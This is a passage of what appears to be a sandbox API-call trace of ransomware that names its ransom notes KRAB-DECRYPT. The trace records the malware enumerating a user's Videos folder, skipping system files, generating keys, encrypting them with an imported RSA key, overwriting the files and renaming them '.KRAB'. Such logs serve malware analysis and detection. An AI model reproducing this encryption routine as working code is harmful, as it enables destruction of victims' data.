param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\KRAB-DECRYPT.txt.KRAB") returned 69 [0099.471] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\KRAB-DECRYPT.txt") returned 64 [0099.471] lstrlenW (lpString=".txt") returned 4 [0099.471] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.471] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0099.471] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.471] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\KRAB-DECRYPT.txt") returned 64 [0099.471] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\KRAB-DECRYPT.txt") returned 64 [0099.471] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0099.471] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0099.471] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0099.471] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0099.471] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0099.471] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0099.471] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0099.472] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0099.472] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0099.472] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0099.472] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.472] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0099.472] lstrcmpW (lpString1="qVLMfOzUE.mkv", lpString2=".") returned 1 [0099.472] lstrcmpW (lpString1="qVLMfOzUE.mkv", lpString2="..") returned 1 [0099.472] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\", lpString2="qVLMfOzUE.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\qVLMfOzUE.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\qVLMfOzUE.mkv" [0099.472] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.472] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\qVLMfOzUE.mkv.KRAB") returned 66 [0099.472] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\qVLMfOzUE.mkv") returned 61 [0099.472] lstrlenW (lpString=".mkv") returned 4 [0099.472] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.473] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mkv ") returned 5 [0099.473] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.473] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\qVLMfOzUE.mkv") returned 61 [0099.473] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\qVLMfOzUE.mkv") returned 61 [0099.473] lstrcmpiW (lpString1="qVLMfOzUE.mkv", lpString2="desktop.ini") returned 1 [0099.473] lstrcmpiW (lpString1="qVLMfOzUE.mkv", lpString2="autorun.inf") returned 1 [0099.473] lstrcmpiW (lpString1="qVLMfOzUE.mkv", lpString2="ntuser.dat") returned 1 [0099.473] lstrcmpiW (lpString1="qVLMfOzUE.mkv", lpString2="iconcache.db") returned 1 [0099.473] lstrcmpiW (lpString1="qVLMfOzUE.mkv", lpString2="bootsect.bak") returned 1 [0099.473] lstrcmpiW (lpString1="qVLMfOzUE.mkv", lpString2="boot.ini") returned 1 [0099.473] lstrcmpiW (lpString1="qVLMfOzUE.mkv", lpString2="ntuser.dat.log") returned 1 [0099.473] lstrcmpiW (lpString1="qVLMfOzUE.mkv", lpString2="thumbs.db") returned -1 [0099.473] lstrcmpiW (lpString1="qVLMfOzUE.mkv", lpString2="KRAB-DECRYPT.html") returned 1 [0099.473] lstrcmpiW (lpString1="qVLMfOzUE.mkv", lpString2="KRAB-DECRYPT.txt") returned 1 [0099.473] lstrcmpiW (lpString1="qVLMfOzUE.mkv", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.473] lstrcmpiW (lpString1="qVLMfOzUE.mkv", lpString2="ntldr") returned 1 [0099.473] lstrcmpiW (lpString1="qVLMfOzUE.mkv", lpString2="NTDETECT.COM") returned 1 [0099.473] lstrcmpiW (lpString1="qVLMfOzUE.mkv", lpString2="Bootfont.bin") returned 1 [0099.473] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.474] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0099.474] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.474] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.474] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.474] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0099.474] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0099.474] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.475] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x10114e0) returned 1 [0099.475] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.475] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.475] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.475] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0099.475] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0099.475] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.476] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011238) returned 1 [0099.476] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd920) returned 1 [0099.476] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0099.476] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0099.476] GetLastError () returned 0x0 [0099.476] CryptDestroyKey (hKey=0xfbd920) returned 1 [0099.476] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0099.476] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10114e0) returned 1 [0099.477] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd7a0) returned 1 [0099.477] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0099.477] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0099.477] GetLastError () returned 0x0 [0099.477] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.477] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0099.477] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\qVLMfOzUE.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\qvlmfozue.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0099.477] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.479] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.480] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x6cc8, lpOverlapped=0x0) returned 1 [0099.490] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff9338, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.490] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x6cc8, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x6cc8, lpOverlapped=0x0) returned 1 [0099.491] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0099.491] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.494] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.494] CloseHandle (hObject=0x3a8) returned 1 [0099.495] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.495] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\qVLMfOzUE.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\qvlmfozue.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\qVLMfOzUE.mkv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\qvlmfozue.mkv.krab")) returned 1 [0099.496] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.496] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0099.496] lstrcmpW (lpString1="Tn91PxHxbNLkQYSD329r.swf", lpString2=".") returned 1 [0099.496] lstrcmpW (lpString1="Tn91PxHxbNLkQYSD329r.swf", lpString2="..") returned 1 [0099.496] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\", lpString2="Tn91PxHxbNLkQYSD329r.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\Tn91PxHxbNLkQYSD329r.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\Tn91PxHxbNLkQYSD329r.swf" [0099.496] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.496] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\Tn91PxHxbNLkQYSD329r.swf.KRAB") returned 77 [0099.496] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\Tn91PxHxbNLkQYSD329r.swf") returned 72 [0099.496] lstrlenW (lpString=".swf") returned 4 [0099.496] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.497] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".swf ") returned 5 [0099.497] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.497] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\Tn91PxHxbNLkQYSD329r.swf") returned 72 [0099.497] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\Tn91PxHxbNLkQYSD329r.swf") returned 72 [0099.497] lstrcmpiW (lpString1="Tn91PxHxbNLkQYSD329r.swf", lpString2="desktop.ini") returned 1 [0099.497] lstrcmpiW (lpString1="Tn91PxHxbNLkQYSD329r.swf", lpString2="autorun.inf") returned 1 [0099.497] lstrcmpiW (lpString1="Tn91PxHxbNLkQYSD329r.swf", lpString2="ntuser.dat") returned 1 [0099.497] lstrcmpiW (lpString1="Tn91PxHxbNLkQYSD329r.swf", lpString2="iconcache.db") returned 1 [0099.497] lstrcmpiW (lpString1="Tn91PxHxbNLkQYSD329r.swf", lpString2="bootsect.bak") returned 1 [0099.497] lstrcmpiW (lpString1="Tn91PxHxbNLkQYSD329r.swf", lpString2="boot.ini") returned 1 [0099.497] lstrcmpiW (lpString1="Tn91PxHxbNLkQYSD329r.swf", lpString2="ntuser.dat.log") returned 1 [0099.497] lstrcmpiW (lpString1="Tn91PxHxbNLkQYSD329r.swf", lpString2="thumbs.db") returned 1 [0099.497] lstrcmpiW (lpString1="Tn91PxHxbNLkQYSD329r.swf", lpString2="KRAB-DECRYPT.html") returned 1 [0099.497] lstrcmpiW (lpString1="Tn91PxHxbNLkQYSD329r.swf", lpString2="KRAB-DECRYPT.txt") returned 1 [0099.497] lstrcmpiW (lpString1="Tn91PxHxbNLkQYSD329r.swf", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.497] lstrcmpiW (lpString1="Tn91PxHxbNLkQYSD329r.swf", lpString2="ntldr") returned 1 [0099.497] lstrcmpiW (lpString1="Tn91PxHxbNLkQYSD329r.swf", lpString2="NTDETECT.COM") returned 1 [0099.497] lstrcmpiW (lpString1="Tn91PxHxbNLkQYSD329r.swf", lpString2="Bootfont.bin") returned 1 [0099.497] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.498] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0099.498] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.499] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.499] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.499] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0099.499] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0099.499] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.499] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0099.500] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.500] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.500] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.500] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0099.500] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.500] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.501] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0099.501] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd7a0) returned 1 [0099.501] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0099.501] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0099.501] GetLastError () returned 0x0 [0099.501] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.502] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.502] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011678) returned 1 [0099.502] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd920) returned 1 [0099.502] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0099.502] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0099.502] GetLastError () returned 0x0 [0099.502] CryptDestroyKey (hKey=0xfbd920) returned 1 [0099.502] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0099.502] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\Tn91PxHxbNLkQYSD329r.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\tn91pxhxbnlkqysd329r.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0099.503] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.503] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.504] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x5fb7, lpOverlapped=0x0) returned 1 [0099.517] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffffa049, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.517] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x5fb7, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x5fb7, lpOverlapped=0x0) returned 1 [0099.517] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0099.517] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.520] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.521] CloseHandle (hObject=0x3a8) returned 1 [0099.521] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.521] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\Tn91PxHxbNLkQYSD329r.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\tn91pxhxbnlkqysd329r.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\Tn91PxHxbNLkQYSD329r.swf.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\tn91pxhxbnlkqysd329r.swf.krab")) returned 1 [0099.524] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.525] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0099.525] lstrcmpW (lpString1="x-6Wz-eBuP1F8rehH Z.avi", lpString2=".") returned 1 [0099.525] lstrcmpW (lpString1="x-6Wz-eBuP1F8rehH Z.avi", lpString2="..") returned 1 [0099.525] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\", lpString2="x-6Wz-eBuP1F8rehH Z.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\x-6Wz-eBuP1F8rehH Z.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\x-6Wz-eBuP1F8rehH Z.avi" [0099.525] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.525] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\x-6Wz-eBuP1F8rehH Z.avi.KRAB") returned 76 [0099.525] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\x-6Wz-eBuP1F8rehH Z.avi") returned 71 [0099.526] lstrlenW (lpString=".avi") returned 4 [0099.526] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.526] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".avi ") returned 5 [0099.526] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.526] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\x-6Wz-eBuP1F8rehH Z.avi") returned 71 [0099.526] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\x-6Wz-eBuP1F8rehH Z.avi") returned 71 [0099.526] lstrcmpiW (lpString1="x-6Wz-eBuP1F8rehH Z.avi", lpString2="desktop.ini") returned 1 [0099.526] lstrcmpiW (lpString1="x-6Wz-eBuP1F8rehH Z.avi", lpString2="autorun.inf") returned 1 [0099.526] lstrcmpiW (lpString1="x-6Wz-eBuP1F8rehH Z.avi", lpString2="ntuser.dat") returned 1 [0099.526] lstrcmpiW (lpString1="x-6Wz-eBuP1F8rehH Z.avi", lpString2="iconcache.db") returned 1 [0099.526] lstrcmpiW (lpString1="x-6Wz-eBuP1F8rehH Z.avi", lpString2="bootsect.bak") returned 1 [0099.526] lstrcmpiW (lpString1="x-6Wz-eBuP1F8rehH Z.avi", lpString2="boot.ini") returned 1 [0099.527] lstrcmpiW (lpString1="x-6Wz-eBuP1F8rehH Z.avi", lpString2="ntuser.dat.log") returned 1 [0099.527] lstrcmpiW (lpString1="x-6Wz-eBuP1F8rehH Z.avi", lpString2="thumbs.db") returned 1 [0099.527] lstrcmpiW (lpString1="x-6Wz-eBuP1F8rehH Z.avi", lpString2="KRAB-DECRYPT.html") returned 1 [0099.527] lstrcmpiW (lpString1="x-6Wz-eBuP1F8rehH Z.avi", lpString2="KRAB-DECRYPT.txt") returned 1 [0099.527] lstrcmpiW (lpString1="x-6Wz-eBuP1F8rehH Z.avi", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.527] lstrcmpiW (lpString1="x-6Wz-eBuP1F8rehH Z.avi", lpString2="ntldr") returned 1 [0099.527] lstrcmpiW (lpString1="x-6Wz-eBuP1F8rehH Z.avi", lpString2="NTDETECT.COM") returned 1 [0099.527] lstrcmpiW (lpString1="x-6Wz-eBuP1F8rehH Z.avi", lpString2="Bootfont.bin") returned 1 [0099.527] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.527] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0099.528] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.528] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.528] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.528] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0099.528] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0099.528] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.529] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0099.529] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.529] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.530] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.530] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0099.530] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0099.530] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.530] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011678) returned 1 [0099.530] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd920) returned 1 [0099.530] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, 